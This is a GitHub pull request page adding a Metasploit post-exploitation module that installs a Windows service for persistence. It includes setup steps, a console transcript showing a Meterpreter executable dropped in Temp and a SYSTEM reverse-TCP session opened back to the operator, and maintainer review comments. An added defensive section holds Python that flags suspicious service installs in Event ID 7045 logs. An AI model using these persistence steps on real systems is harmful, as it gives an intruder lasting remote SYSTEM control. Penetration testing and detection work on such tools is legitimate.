
Add exploit module windows persistent service #11123

Merged: jrobles-r7 merged 23 commits into rapid7:master from Green-m:feature/win_service on Dec 17, 2018

Conversation

@jrobles-r7 (Contributor)
Github was showing #10822 as 200+ commits and 100+ files changed. Opening in new PR so it is shown correctly.

Note: This PR relies on #10821; please merge that before merging this. Could be merged now.

Resolved #10385

Verification steps

  • get session on target
  • use post/windows/manage/persistence_service
  • set payload <payload>
  • set lport <lport>
  • set lhost <lhost>
  • set handler true
  • run

Usage

msf5 post(windows/manage/persistence_service) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: test-PC\test
meterpreter > sysinfo
Computer        : TEST-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 post(windows/manage/persistence_service) > options

Module options (post/windows/manage/persistence_service):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   HANDLER  true                             no        Start an exploit/multi/handler to receive the connection
   LHOST    192.168.56.1                     yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        The payload to use in the service.
   SESSION  1                                yes       The session to run this module on.
msf5 post(windows/manage/persistence_service) > run

[*] Running module against TEST-PC
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.1:4433
[+] Meterpreter service exe written to C:\Users\test\AppData\Local\Temp\IDJkb.exe
[*] Creating service pWbPkeDm
[*] Cleanup Meterpreter RC File: /Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc
[*] Post module execution completed
[*] Sending stage (179779 bytes) to 192.168.56.101
msf5 post(windows/manage/persistence_service) > [*] Meterpreter session 3 opened (192.168.56.1:4433 -> 192.168.56.101:50101) at 2018-10-17 18:37:51 +0800
msf5 post(windows/manage/persistence_service) > sessions

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x86/windows  test-PC\test @ TEST-PC         192.168.56.1:8888 -> 192.168.56.101:50098 (192.168.56.101)
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ TEST-PC  192.168.56.1:4433 -> 192.168.56.101:50101 (192.168.56.101)

msf5 post(windows/manage/persistence_service) >

Enjoy it!
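The transcript above shows what this module leaves on the host: a randomly named service (pWbPkeDm) whose binary is dropped under the user's Temp directory and which calls back as NT AUTHORITY\SYSTEM. From the defender's side, the Windows System log records every service installation as Event ID 7045 from the Service Control Manager, and those two traits (binary in a user-writable drop directory, machine-generated service name) are cheap to triage. The following is an added example written for this page, not code from the PR or from Metasploit; the event records are constructed to mimic the 7045 data fields, the directory list and the name heuristic are assumptions, and the first record reuses the service name and path shown in the module output.

```python
import re

# Constructed sample records modelled on the data fields of Windows System
# log Event ID 7045 ("A service was installed in the system"). Values are
# made up for this example; the first one mirrors the service name and drop
# path shown in the module output above.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "pWbPkeDm",
     "ImagePath": r"C:\Users\test\AppData\Local\Temp\IDJkb.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "gupdate",
     "ImagePath": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "xkQzv",
     "ImagePath": r"C:\Windows\Temp\svc.exe",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": 7036, "ServiceName": "Spooler",   # state change, not an install
     "ImagePath": "", "StartType": "", "AccountName": ""},
]

# Assumed list of directories a legitimate service binary should not live in:
# user-writable temp/drop locations. Matched case-insensitively anywhere in
# ImagePath, so trailing arguments do not need to be stripped first.
USER_WRITABLE_DIRS = re.compile(
    r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|\\ProgramData\\|\\Users\\Public\\",
    re.IGNORECASE,
)

VOWELS = set("aeiouAEIOU")


def looks_random(name: str) -> bool:
    """Heuristic for machine-generated service names such as 'pWbPkeDm':
    short, purely alphabetic, frequent upper/lower switches, few vowels."""
    if not name.isalpha() or not 5 <= len(name) <= 12:
        return False
    case_switches = sum(
        1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper()
    )
    vowel_ratio = sum(c in VOWELS for c in name) / len(name)
    return case_switches >= 2 and vowel_ratio < 0.35


def triage_service_installs(events):
    """Return one finding per 7045 event that trips at least one heuristic.
    Each finding lists the reasons so an analyst can see why it was flagged."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 7045:
            continue
        reasons = []
        if USER_WRITABLE_DIRS.search(ev["ImagePath"]):
            reasons.append("binary in user-writable temp directory")
        if looks_random(ev["ServiceName"]):
            reasons.append("random-looking service name")
        # Privilege context only matters once something else is suspicious.
        if reasons and ev.get("AccountName") == "LocalSystem":
            reasons.append("runs as LocalSystem")
        if reasons:
            findings.append({"service": ev["ServiceName"],
                             "image": ev["ImagePath"],
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage_service_installs(SAMPLE_EVENTS):
        print(f"{f['service']}: {f['image']}  <- {', '.join(f['reasons'])}")
```

Run against the constructed records, the Google updater entry passes while the two Temp-resident services are reported with their reasons. In a real deployment the records would come from the System log (Get-WinEvent or a SIEM export) and the directory list would be tuned to the environment; the name heuristic is deliberately loose and is meant to prioritise review, not to block on its own.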

jrobles-r7 changed the title from "Feature/win service" to "Add exploit module windows persistent service" on Dec 14, 2018
Green-m added the msf5 label on Dec 14, 2018
Green-m (Contributor) commented Dec 14, 2018

Should only be valid for msf5 on account of the metasm compiler feature.

jrobles-r7 self-assigned this on Dec 14, 2018

jrobles-r7 (Contributor, Author) left a review comment

Some changes are needed to handle paths with spaces.
In the C code, the logic for checking the install/start service can be changed for comparing against the last provided argument, argv[argc-1]. Using the last argument will let us keep the strtok logic that is currently in the code and let us handle paths with spaces.

Review comment thread on modules/exploits/windows/local/persistence_service.rb (outdated)

jrobles-r7 merged commit cb0cde3 into rapid7:master on Dec 17, 2018
jrobles-r7 (Contributor, Author) commented Dec 17, 2018

Release Notes

The exploit/windows/local/persistence_service module can be used to create a Windows service for persistence.

jrobles-r7 (Contributor, Author) commented

Thanks @Green-m!

Green-m (Contributor) commented Dec 17, 2018 via email


Development

Successfully merging this pull request may close these issues: Create persistent service on windows

3 participants